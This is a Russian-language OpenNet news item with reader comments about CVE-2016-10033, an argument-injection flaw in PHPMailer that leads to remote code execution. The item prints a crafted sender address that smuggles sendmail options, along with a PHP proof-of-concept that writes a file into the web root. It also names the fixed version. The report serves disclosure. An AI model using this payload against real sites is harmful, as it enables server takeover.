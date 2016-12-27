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27.12.2016 19:21  Критическая уязвимость в PHPMailer, применяемом в WordPress, Drupal и Joomla

В PHPMailer, популярной библиотеке для организации отправки электронный писем из приложений на языке PHP, число пользователей которой оценивается в 9 миллионов, обнаружена критическая уязвимость (CVE-2016-10033), позволяющая инициировать удаленное выполнение кода без прохождения аутентификации.

Проблема аналогична недавно найденной уязвимости в Roundcube Webmail и также связана с небезопасным использованием PHP-функции mail() совместно с утилитой sendmail в качестве транспорта по умолчанию. Отсутствие должной проверки параметра "Sender" (неверная интерпретация экранированных кавычек), позволяет организовать передачу утилите sendmail произвольных аргументов командной строки, в том числе можно переопределить директорию очереди и файл с логом, что позволяет организовать запись сообщения в произвольный файл в локальной ФС на сервере с правами под которыми запускается PHP-приложение.

В частности, попытка отправки сообщения на email "Attacker \" -Param2 -Param3"@test.com приведёт к выполнению утилиты sendmail со следующими аргументами: 


   Arg no. 0 == [/usr/sbin/sendmail]
   Arg no. 1 == [-t]
   Arg no. 2 == [-i]
   Arg no. 3 == [-fAttacker\]
   Arg no. 4 == [-Param2]
   Arg no. 5 == [-Param3"@test.com]

Для записи кода в файл /var/www/cache/phpcode.php в качестве отправителя можно указать '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com', что демонстрирует следующий прототип эксплоита (опция "-X/var/www/cache/phpcode.php" приведёт к созданию лога /var/www/cache/phpcode.php в который будет записано тело сообщения): 


   $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com';
   $msg_body  = "{?php phpinfo(); ?}";

   require_once('class.phpmailer.php');
   $mail = new PHPMailer(); 

   $mail->SetFrom($email_from, 'Client Name');

   $address = "customer_feedback@company-X.com";
   $mail->AddAddress($address, "Some User");

   $mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033";
   $mail->MsgHTML($msg_body);

   if(!$mail->Send()) {
     echo "Mailer Error: " . $mail->ErrorInfo;
   } else {
     echo "Message sent!\n";
   }

Проблема устранена в PHPMailer 5.2.18, все более ранние выпуски подвержены уязвимости. Дистрибутивы пока не выпустили обновления пакетов: Debian, RHEL/CentOS, Fedora, Ubuntu, SUSE, openSUSE. Проблема проявляется при использовании настроек по умолчанию: отключен safe_mode, а для отправки используется PHP-функция mail() и утилита sendmail.

Уязвимость усугубляется тем, что PHPMailer применяется во многих популярных продуктах для Web, в том числе в WordPress, Drupal, Joomla, 1CRM, SugarCRM, Yii и сотнях других проектов. Атака может быть проведена через различные формы отправки отзывов, регистарции, связи с администрацией и других операций, приводящих к отправке сообщений по электронной почте при помощи PHPMailer. Уязвимы или нет конкретные системы зависит от того, насколько качественно в них реализованы дополнительные проверки email-адресов перед отправкой сообщений через PHPMailer и используются ли настройки PHPMailer по умолчанию.

Дополнение: WordPress и Drupal (модули PHPMailer и SMTP) опубликовали предупреждение о проявлении уязвимости при использовании проблемной версии PHPMailer. Уязвимости присвоен наивысший (Highly Critical) уровень опасности.

  1. Главная ссылка к новости (http://openwall.com/lists/oss-...)
  2. OpenNews: Уязвимость в Roundcube Webmail, позволяющая выполнить код на сервере
  3. OpenNews: Критическая root-уязвимость в MySQL
  4. OpenNews: Уязвимость в MySQL, позволяющая поднять свои привилегии
  5. OpenNews: Root-уязвимость из-за некорректных настроек в пакете nginx для Debian и Ubuntu
Автор новости: Mr.Mistoffelees
Тип: Проблемы безопасности
Ключевые слова: phpmailer, sendmail
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  • 1.1, Аноним, 21:19, 27/12/2016 [ответить] [смотреть все]
    		• –2 +/
    php головного мозга
     
     
  • 2.2, A.Stahl, 21:26, 27/12/2016 [^] [ответить] [смотреть все]
    		• +/
    Зато они не боятся malloc/free и от чего там ещё падают в обморок Явисты-Питонисты?
     
     
  • 3.3, Куяврег, 21:44, 27/12/2016 [^] [ответить] [смотреть все]
    		• +5 +/
    да они вообще нихрена не боятся. отчаянные люди...
     
  • 3.10, Alex, 23:01, 27/12/2016 [^] [ответить] [смотреть все]
    		• +/
    Xex, malloc/free актуально для С, так что этого стоит бояться в том числе пользователям интерпретатора PHP, тем более что кажется он написан весьма чудаковато, периодически оскаливаясь различным уязвимостями, связанными с неправильным парсингом аргументов и т.п.
     
  • 1.4, burik666, 21:46, 27/12/2016 [ответить] [смотреть все]
    		• +/
    Это тоже самое что и http://www.opennet.ru/opennews/art.shtml?num=45643
     
  • 1.5, Аноним, 21:50, 27/12/2016 [ответить] [смотреть все]  
    		• +/
    В комментарии к прошлой новости я ссылки кидал https www opennet ru openforum ... весь текст скрыт [показать]
     
  • 1.6, th3m3, 22:18, 27/12/2016 [ответить] [смотреть все]  
    		• +/
    >>WordPress, Drupal и Joomla

    Пользователи всякого устаревшего php-хлама - должны страдать.

     
     
  • 2.7, Аноним, 22:29, 27/12/2016 [^] [ответить] [смотреть все]  
    		• +/
    Не пользователи, а заказчики WP еще долго будет царствовать в клозетах и голова... весь текст скрыт [показать]
     
  • 2.12, Аноним, 23:32, 27/12/2016 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    Кому они должны, оболтус?
     
  • 1.8, Michael Shigorin, 22:39, 27/12/2016 [ответить] [смотреть все]  
    		• +/
    К слову о статической линковке...

    PS: к TYPO3 кто-то лет десять тому сделал плагин с этой штукой и через годик забросил, по счастью: https://typo3.org/extensions/repository/view/bb_phpmailer

     
  • 1.9, uldus, 22:56, 27/12/2016 [ответить] [смотреть все]  
    		• +/
    Этим не ограничится, PHPMailer жуткий комбайн в котором встроен SMTP-сервер, система массовой рассылки, NTLM, CRAM-MD5, XOAUTH2, TLS, DKIM и S/MIME.

    И что-то мне кажется, что и эту дыру не до конца поправили. Там ниже по коду при пустом $this->Sender выставляется $smtp_from = $this->From без обёртки $this->validateAddress(), которую добавили для $this->Sender.

     
  • 1.11, Уровень Предприятия, 23:24, 27/12/2016 [ответить] [смотреть все]    [к модератору]  
    		• +/
    Глобальный, надёжный.
     

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